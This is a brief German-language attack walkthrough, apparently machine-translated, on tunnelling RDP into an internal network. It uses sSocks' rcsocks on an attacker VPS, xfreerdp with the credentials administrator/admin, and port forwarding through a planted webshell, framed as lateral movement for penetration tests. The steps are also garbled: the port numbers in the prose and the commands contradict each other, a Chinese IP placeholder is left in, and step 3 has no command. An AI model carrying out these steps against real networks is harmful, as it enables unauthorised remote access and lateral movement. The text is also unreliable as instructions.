
SOCKS-Proxy für Portweiterleitung und RDP-Tunneling, der Lateral Movement und Fernzugriff in Penetrationstest-Szenarien ermöglicht.
Schritt 1: Richte mit sSocks auf dem VPS eine Zuordnung zwischen den Ports 3388 und 3389 ein, um den Datenverkehr zwischen ihnen fließen zu lassen:
root @ kali:〜#/ root / ssocks-0.0.14 / src / rcsocks -l 3389 -p 3389 -vv
Schritt 2: Verbinde dich vom Angreifer-Endpunkt aus mit Port 3388 des VPS. Es wird empfohlen, freerdp anstelle von rdesktop zu verwenden, da Ersteres das Warten auf entfernte und lokale Verbindungen, das Kopieren und Einfügen von Text sowie das Einhängen von Remote-Dateisystemen unterstützt:
root@kali:~#xfreerdp /u:administrator /p:admin /v:【你的ip】:3389 Schritt 3: Führe sofort über die große Webshell die Portweiterleitung aus; möglicherweise musst du mehrfach hintereinander auf start klicken:
Hinweis: Der gesamte Ablauf hängt empfindlich von der Reihenfolge der Schritte ab. Sobald die Port-Weiterleitung von rcsocks auf dem VPS eingerichtet ist, musst du dich nicht mehr darum kümmern. Führe zuerst auf dem Angreifer-Endpunkt xfreerdp aus und halte die Sitzung aufrecht; leite danach über die Webshell den Port 3389 des internen Netzwerks weiter.